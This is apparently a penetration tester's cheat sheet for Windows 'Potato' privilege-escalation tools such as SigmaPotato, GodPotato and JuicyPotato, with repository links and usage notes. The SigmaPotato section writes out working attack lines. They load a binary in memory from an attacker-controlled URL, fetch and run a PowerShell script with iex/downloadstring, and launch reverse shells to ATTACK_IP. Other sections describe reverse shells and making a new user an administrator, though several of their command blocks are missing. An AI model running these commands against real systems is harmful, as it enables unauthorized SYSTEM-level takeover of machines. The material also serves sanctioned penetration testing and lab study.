githubEdit

Potato Exploits

Links for reference:

  1. https://github.com/AtvikSecurity/CentralizedPotatoes

  2. https://jlajara.gitlab.io/Potatoes_Windows_Privesc

  3. https://github.com/tylerdotrar/SigmaPotato.git

1) Sigma Potato

Load binary

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

Gain a reverse shell

.\SigmaPotato.exe --revshell ATTACK_IP PORT

Run a command

.\SigmaPotato.exe COMMAND

Powershell Implementation

iex(new-object net.webclient).downloadstring('http://ATTACK_IP/Invoke-SigmaPotato.ps1')
Invoke-SigmaPotato -Command COMMAND
Invoke-SigmaPotato -Command "--revshell ATTACK_IP PORT"

2) Dead Potato

Link: https://github.com/lypd0/DeadPotato

Usage

Is the SeImpersonatePrivilege right enabled in your context? With DeadPotato, it is possible to achieve maximum privileges on the local system.

The tool will attempt to start an elevated process running in the context of the NT AUTHORITY\SYSTEM user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.

3) Bat Potato

Link: https://github.com/0x4xel/Bat-Potato

Usage

Attacker:

Server will be listening incomming requests. Keep that connection alive, open new tab and open another listening port for the reverse shell.

You must upload the following files on the server:

  • wget.exe

  • Bat-Potato.bat file generated by python script

On the server, execute

This will upload shell.bat, nc.exe and Juicy binary from server and will attempt to Privesc making all the CLSID request automatically.

4) God Potato

Link: https://github.com/BeichenDream/GodPotato

Requirements: Check which .NET version is installed on the machine

Then you can use GodPotato for the versions:

  1. Run commands

  2. Execute reverse shell

5) Rogue Potato

You need to have a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim

Link: https://github.com/k4sth4/Rogue-Potato

  1. Run on your machine the socat redirection

  2. Execute PoC

6) SharpEfsPotato

Link: https://github.com/bugch3ck/SharpEfsPotato

Command:

7) DCOMPotato

Link: https://github.com/zcgonvh/DCOMPotato

Revshell Command:

Create a new user and make him admin

8) JuicyPotato

x64 Link: https://github.com/ohpe/juicy-potato/releases/tag/v0.1 x86 Link: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/tag/1.2

CLSIDs are contained within the x64 repository. Otherwise, you can find them in this link:

https://ohpe.it/juicy-potato/CLSID/

Revshell command

Add the user to administrators

Last updated